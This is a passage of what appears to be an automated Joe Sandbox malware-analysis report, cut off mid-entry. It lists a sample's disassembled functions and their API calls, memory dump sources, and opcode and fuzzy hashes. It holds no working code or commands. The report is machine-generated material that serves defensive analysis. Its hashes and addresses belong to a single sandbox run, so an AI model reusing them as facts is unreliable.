                                              • RtlAllocateHeap.NTDLL(016A0000,00000000,00000001,?,00000004,?,?,00051003,?), ref: 0005597F
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                              • String ID:
                                              • API String ID: 1372826849-0
                                              • Opcode ID: ee7e39663a587a61eb418efc5d44a449f8ed31e96fab8804bc32d1d837a3a7db
                                              • Instruction ID: a028c6e9cd90bc8655739f02afb37f42027aead124352db32f51121fe6874f94
                                              • Opcode Fuzzy Hash: ee7e39663a587a61eb418efc5d44a449f8ed31e96fab8804bc32d1d837a3a7db
                                              • Instruction Fuzzy Hash: B601F531315F01DAE6512B24EC22AAF3398DF43773F100526FD14AA5D2DE789D088771
                                              APIs
                                              • _free.LIBCMT ref: 000992D6
                                                • Part of subcall function 00052F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00059C54,00000000,00058D5D,000559C3), ref: 00052F99
                                                • Part of subcall function 00052F85: GetLastError.KERNEL32(00000000,?,00059C54,00000000,00058D5D,000559C3), ref: 00052FAB
                                              • _free.LIBCMT ref: 000992E7
                                              • _free.LIBCMT ref: 000992F9
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                              • Instruction ID: d26d73d7d0571f56dbe63cbd36fb74be7a2f7cbee912abaa28de39e816de5cc7
                                              • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                              • Instruction Fuzzy Hash: 99E017A160970267CE64A67CB980ED3B7FC4F89752F15093EB809D7183CE24E8459268
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CALL
                                              • API String ID: 0-4196123274
                                              • Opcode ID: a2e750defdcd9e5b2e202765e661831f39db3582b756f2fd13f7938a966f8807
                                              • Instruction ID: c6121349c60ae5d2a2741658d050c4a4d7a96772e47eed75017f28d4c43d448f
                                              • Opcode Fuzzy Hash: a2e750defdcd9e5b2e202765e661831f39db3582b756f2fd13f7938a966f8807
                                              • Instruction Fuzzy Hash: C0327974608341DFDB25DF14C490A6EB7E6BF85300F15896DE88A8B362D736ED85CB82
                                              APIs
                                                • Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B
                                              • GetWindowTextW.USER32(?,?,00007FFF), ref: 000B5D1E
                                                • Part of subcall function 00050FE6: std::exception::exception.LIBCMT ref: 0005101C
                                                • Part of subcall function 00050FE6: __CxxThrowException@8.LIBCMT ref: 00051031
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8TextThrowWindowstd::exception::exception
                                              • String ID: all
                                              • API String ID: 698342025-991457757
                                              • Opcode ID: ccbf9ec39a75e4e58678f76b768ce330082c4484f00eb305fb91a631fc7a2ed0
                                              • Instruction ID: ab05fb92a47df184abb2defe269c0f6298100d70179eed50549fc3271c7507f6
                                              • Opcode Fuzzy Hash: ccbf9ec39a75e4e58678f76b768ce330082c4484f00eb305fb91a631fc7a2ed0
                                              • Instruction Fuzzy Hash: EE517871604701AFD715EF20C886FEAB7E9FF48714F004A29F9599B292DB70A944CB92
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: EA06
                                              • API String ID: 4104443479-3962188686
                                              • Opcode ID: 088ec3941bee661c11e7b7363aa5810370ab6566b7808389ce37ba0df6389796
                                              • Instruction ID: eb82f424fb0d95741c8b3c136b963ead914477714104f38dcb1e016d209c97fe
                                              • Opcode Fuzzy Hash: 088ec3941bee661c11e7b7363aa5810370ab6566b7808389ce37ba0df6389796
                                              • Instruction Fuzzy Hash: 72418FB1A04198ABDF719B5488517FF7FE5DB56300F284075ECC2E7287C9218D8893E6
                                              APIs
                                              • _strcat.LIBCMT ref: 000AE20C
                                                • Part of subcall function 00034D37: __itow.LIBCMT ref: 00034D62
                                                • Part of subcall function 00034D37: __swprintf.LIBCMT ref: 00034DAC
                                              • _wcscpy.LIBCMT ref: 000AE29B
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: __itow__swprintf_strcat_wcscpy
                                              • String ID:
                                              • API String ID: 1012013722-0
                                              • Opcode ID: 461d2f2bc493ac0fb11ac69b3125fe7361fba3a4d149689d0c84a3172cf1483a
                                              • Instruction ID: 5e368352efda07ea71162b1a74f2f343a3512bf9a331d697da2b03ebbcf9d63f
                                              • Opcode Fuzzy Hash: 461d2f2bc493ac0fb11ac69b3125fe7361fba3a4d149689d0c84a3172cf1483a
                                              • Instruction Fuzzy Hash: 8B913835A00604DFCB29DF58C5859ADB7F5FF4A311B55845AE80A8F3A2DB30EE41CB81
                                              APIs
                                              • _memmove.LIBCMT ref: 000968EC
                                              • _memmove.LIBCMT ref: 0009690A
                                                • Part of subcall function 00096A73: _memmove.LIBCMT ref: 00096B01
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                              • Instruction ID: 52d547d820682ea7a7ebfb51f0f61feb6ce2f0c0e90589276fa0111b4bbe0654
                                              • Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                              • Instruction Fuzzy Hash: FA71BE702006049FCF259F18D845BAEB7E9EF45324F28C908E8D52B392CB33AD41EB91
                                              APIs
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                              • SetErrorMode.KERNELBASE(00000001), ref: 0009AC66
                                              • SetErrorMode.KERNELBASE(00000000,00000001,00000000), ref: 0009AE01
                                                • Part of subcall function 00094FEC: GetFileAttributesW.KERNELBASE(?,00093BFE), ref: 00094FED
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ErrorMode$AttributesFile_memmove
                                              • String ID:
                                              • API String ID: 2117146460-0
                                              • Opcode ID: 6bffadc27cffe682096665292784c38baa5f7b255dd0c711d86e5a4f8895813c
                                              • Instruction ID: 3838c2d55ce253cc99662a978c289846ab2010f7e7bbc0c42fe0ec0a6251949a
                                              • Opcode Fuzzy Hash: 6bffadc27cffe682096665292784c38baa5f7b255dd0c711d86e5a4f8895813c
                                              • Instruction Fuzzy Hash: 23514CB1508341AFD701EF28D8819AAFBE9FF89314F404A2DF49587392D771E945CB92
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 0009614E
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: BuffCharLower
                                              • String ID:
                                              • API String ID: 2358735015-0
                                              • Opcode ID: 85f03628d183b3e865a8bd49981ee27d4a0ccc63faea37ad718ef288b79c3d55
                                              • Instruction ID: d7c1ce8de1ee878f979e296b84ab89344eeab4f46a5bab23a43229c33b3fb3a1
                                              • Opcode Fuzzy Hash: 85f03628d183b3e865a8bd49981ee27d4a0ccc63faea37ad718ef288b79c3d55
                                              • Instruction Fuzzy Hash: FA41A2B6A00209AFDF25DFA4C8819EEB7F8EF44350B14453EE91697252EB31DA44DB50
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE ref: 00050ED5
                                              • CreateProcessW.KERNELBASE ref: 00050EE7
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ChangeCloseCreateFindNotificationProcess
                                              • String ID:
                                              • API String ID: 3988087930-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: 1b2e8db64747b6322615de7baf5cd1faab2a84d6ad3e5a7e14ca0b8291c71ee3
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: E831C671A00109DFD768DF58C48296EF7A6FF59301B788AA5E809CB651E731EDC5CB80
                                              APIs
                                              • IsThemeActive.UXTHEME ref: 00045FEF
                                                • Part of subcall function 0005359C: __lock.LIBCMT ref: 000535A2
                                                • Part of subcall function 0005359C: DecodePointer.KERNEL32(00000001,?,00046004,00088892), ref: 000535AE
                                                • Part of subcall function 0005359C: EncodePointer.KERNEL32(?,?,00046004,00088892), ref: 000535B9
                                                • Part of subcall function 00045F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00045F18
                                                • Part of subcall function 00045F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00045F2D
                                                • Part of subcall function 00045240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0004526C
                                                • Part of subcall function 00045240: IsDebuggerPresent.KERNEL32 ref: 0004527E
                                                • Part of subcall function 00045240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 000452E6
                                                • Part of subcall function 00045240: SetCurrentDirectoryW.KERNEL32(?), ref: 00045366
                                              • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0004602F
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                              • String ID:
                                              • API String ID: 1438897964-0
                                              • Opcode ID: ff32f638a55d06c53267fa9d7481a7c8d68f7cbd879d1ec5983092addebf7b49
                                              • Instruction ID: 05d965f9c2359d13f994832311b40e0c04d63889f808dd43590d763100a9f06e
                                              • Opcode Fuzzy Hash: ff32f638a55d06c53267fa9d7481a7c8d68f7cbd879d1ec5983092addebf7b49
                                              • Instruction Fuzzy Hash: F111AF719083019BD314EF68EC4599ABFE8FF89710F00851EF444872B2DB74A949DF96
                                              APIs
                                                • Part of subcall function 0005593C: __FF_MSGBANNER.LIBCMT ref: 00055953
                                                • Part of subcall function 0005593C: __NMSG_WRITE.LIBCMT ref: 0005595A
                                                • Part of subcall function 0005593C: RtlAllocateHeap.NTDLL(016A0000,00000000,00000001,?,00000004,?,?,00051003,?), ref: 0005597F
                                              • std::exception::exception.LIBCMT ref: 0005101C
                                              • __CxxThrowException@8.LIBCMT ref: 00051031
                                                • Part of subcall function 000587CB: RaiseException.KERNEL32(?,?,?,000ECAF8,?,?,?,?,?,00051036,?,000ECAF8,?,00000001), ref: 00058820
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 3902256705-0
                                              • Opcode ID: c7c7741a0c52c4cd2178dec1b197b9b08819b4663e713ffbbffdb05ad629428c
                                              • Instruction ID: 83c4bc5341d2953d66ddb42eac41a7beefdb8a11671c7ebb0a60e8a7d53ee2f9
                                              • Opcode Fuzzy Hash: c7c7741a0c52c4cd2178dec1b197b9b08819b4663e713ffbbffdb05ad629428c
                                              • Instruction Fuzzy Hash: C6F0F43050420DA6CB20BB58EC16EDF77EC9F00312F104829FC04A2192DFB18B88C7E0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: __lock_file_memset
                                              • String ID:
                                              • API String ID: 26237723-0
                                              • Opcode ID: ba2ec1c360ab15d05dff877300c445e1bdd905c9a72e6e352ce3ea0d747e66ca
                                              • Instruction ID: edaa68bb3c5d4266fbaa373b4d7976ae4681c60a0f51270556af6c83a5ba0183
                                              • Opcode Fuzzy Hash: ba2ec1c360ab15d05dff877300c445e1bdd905c9a72e6e352ce3ea0d747e66ca
                                              • Instruction Fuzzy Hash: 03012171800749EBCF51AF668C129EF7BA1AF90363F148515BC247B1A2DB318A19DB91
                                              APIs
                                                • Part of subcall function 00058D58: __getptd_noexit.LIBCMT ref: 00058D58
                                              • __lock_file.LIBCMT ref: 0005560B
                                                • Part of subcall function 00056E3E: __lock.LIBCMT ref: 00056E61
                                              • __fclose_nolock.LIBCMT ref: 00055616
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                              • String ID:
                                              • API String ID: 2800547568-0
                                              • Opcode ID: 1c1fafe3accc3ee49e30fab16838bffa3a0c04f5f6d228b32f1e27be9863e2cc
                                              • Instruction ID: 184cf1c5691774a70a3fbac6788079dccbee765516991f8fee89436076b8598a
                                              • Opcode Fuzzy Hash: 1c1fafe3accc3ee49e30fab16838bffa3a0c04f5f6d228b32f1e27be9863e2cc
                                              • Instruction Fuzzy Hash: FDF090B1902B059AE7206B658C22BAF77E16F40333F218609AC24BB1D2DB7C4A099B51
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: SleepTimetime
                                              • String ID:
                                              • API String ID: 346578373-0
                                              • Opcode ID: 5a52ebaa2017b19236348be4845ca06fc6a697f5cbee5e836a6e7d5676698c61
                                              • Instruction ID: 3af6814c5a908a9de9ef0c3edd89d7a798f6e1c848fa61666e991bac2b0d7a8b
                                              • Opcode Fuzzy Hash: 5a52ebaa2017b19236348be4845ca06fc6a697f5cbee5e836a6e7d5676698c61
                                              • Instruction Fuzzy Hash: 7BF012312446129FD364EB69D859FA6B7E8EF45351F004529E82AC73A1DF70AC40CB91
                                              APIs
                                              • __lock_file.LIBCMT ref: 00055EB4
                                              • __ftell_nolock.LIBCMT ref: 00055EBF
                                                • Part of subcall function 00058D58: __getptd_noexit.LIBCMT ref: 00058D58
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                              • String ID:
                                              • API String ID: 2999321469-0
                                              • Opcode ID: 222d2eec77a992ee07442ea42800798a8f3e3fc8e00ebf76956ebbce9bc83e15
                                              • Instruction ID: c7f642cd595678a89c5f3e4334c60b7216c3b914adc689f3524016229440d40f
                                              • Opcode Fuzzy Hash: 222d2eec77a992ee07442ea42800798a8f3e3fc8e00ebf76956ebbce9bc83e15
                                              • Instruction Fuzzy Hash: 6CF0A031A116159AEB10BB748C037DF72A46F41333F218606AC20BB1D3CF788E0A9B91
                                              APIs
                                              • _memset.LIBCMT ref: 00045AEF
                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00045B1F
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell__memset
                                              • String ID:
                                              • API String ID: 928536360-0
                                              • Opcode ID: f0f4653a6c5e45cf35a822e867fac5f10df7b13ebaf4c71bd166e0fcb6c7cff8
                                              • Instruction ID: f6970558f9e3e2d7ffb80af4e794edc6b63f829d8f595dc88f0fcdec199f6e8c
                                              • Opcode Fuzzy Hash: f0f4653a6c5e45cf35a822e867fac5f10df7b13ebaf4c71bd166e0fcb6c7cff8
                                              • Instruction Fuzzy Hash: 64F0A7708083089FE7D28B24DC497E677BC9700308F0001EABA4C96292D7794B98CF96
                                              APIs
                                              • ___crtCorExitProcess.LIBCMT ref: 000532D5
                                                • Part of subcall function 0005329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,000532DA,00051003,?,00059EEE,000000FF,0000001E,000ECE28,00000008,00059E52,00051003,00051003), ref: 000532AA
                                                • Part of subcall function 0005329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 000532BC
                                              • ExitProcess.KERNEL32 ref: 000532DE
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                              • String ID:
                                              • API String ID: 2427264223-0
                                              • Opcode ID: 6a147df61c06feb2f988bce1bd7b72282e4cc01aee30b292d6d11e3eea965748
